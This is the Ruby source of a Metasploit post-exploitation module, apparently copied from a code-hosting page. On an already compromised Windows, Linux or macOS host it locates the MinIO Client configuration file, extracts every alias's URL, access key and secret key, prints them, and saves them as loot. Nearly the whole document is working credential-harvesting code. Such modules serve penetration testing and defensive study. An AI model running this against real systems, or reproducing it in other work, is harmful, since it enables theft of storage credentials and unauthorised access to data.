Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Post::File
8
  def initialize(info = {})
9
    super(
10
      update_info(
11
        info,
12
        'Name' => 'Gather MinIO Client Key',
13
        'Description' => %q{
14
          This is a module that searches for MinIO Client credentials on a windows remote host.
15
        },
16
        'License' => MSF_LICENSE,
17
        'References' => [
18
          [ 'URL', 'https://blog.kali-team.cn/Metasploit-MinIO-Client-7d940c60ae8545aeaa29c96536dda855' ]
19
        ],
20
        'Author' => ['Kali-Team <kali-team[at]qq.com>'],
21
        'Platform' => [ 'win', 'linux', 'osx', 'unix' ],
22
        'SessionTypes' => %w[meterpreter powershell shell],
23
        'Notes' => {
24
          'Stability' => [],
25
          'Reliability' => [],
26
          'SideEffects' => []
27
        }
28
      )
29
    )
30
    register_options(
31
      [
32
        OptString.new('CONFIG_PATH', [ false, 'Specifies the config file path for MinIO Client']),
33
      ]
34
    )
35
  end
36

37
  def parser_minio(config_path)
38
    print_status("Parsing file #{config_path}")
39
    some_result = Hash.new
40
    if file?(config_path)
41
      file_contents = read_file(config_path)
42
      if file_contents.blank?
43
        print_warning('Configuration file content is empty')
44
        return some_result
45
      end
46
      begin
47
        configuration = JSON.parse(file_contents)
48
        if !configuration['aliases'].nil?
49
          some_result = configuration['aliases']
50
        end
51
      rescue JSON::ParserError => e
52
        print_error("Unable to parse configuration:#{e}")
53
      end
54
    else
55
      print_error("Configuration file not found:#{config_path}")
56
    end
57
    return some_result
58
  end
59

60
  def print_and_save(all_result)
61
    columns = [
62
      'name',
63
      'url',
64
      'accessKey',
65
      'secretKey',
66
      'api',
67
      'path',
68
    ]
69
    tbl = Rex::Text::Table.new(
70
      'Header' => 'MinIO Client Key',
71
      'Columns' => columns
72
    )
73

74
    all_result.each do |name, item|
75
      row = [name, item['url'], item['accessKey'], item['secretKey'], item['api'], item['path']]
76
      tbl << row
77
    end
78

79
    print_line(tbl.to_s)
80
    if tbl.rows.count > 0
81
      path = store_loot('host.minio', 'text/plain', session, tbl, 'minio_client.txt', 'MinIO Client Key')
82
      print_good("Session info stored in: #{path}")
83
    end
84
  end
85

86
  def get_config_file_path
87
    case session.platform
88
    when 'windows'
89
      home = get_env('USERPROFILE')
90
      return if home.nil?
91

92
      config_path = home + '\\mc\\config.json'
93
      return config_path
94
    when 'linux', 'osx', 'unix'
95
      home = get_env('HOME')
96
      return if home.nil?
97

98
      config_path = home + '/.mc/config.json'
99
      return config_path
100
    end
101
  end
102

103
  def run
104
    # used to grab files for each user on the remote host
105
    config_path = datastore['CONFIG_PATH'] || ''
106
    result = Hash.new
107
    if config_path.empty?
108
      result = parser_minio(get_config_file_path)
109
    else
110
      result = parser_minio(config_path)
111
    end
112
    return if result.empty?
113

114
    print_and_save(result)
115
  end
116
end
117

118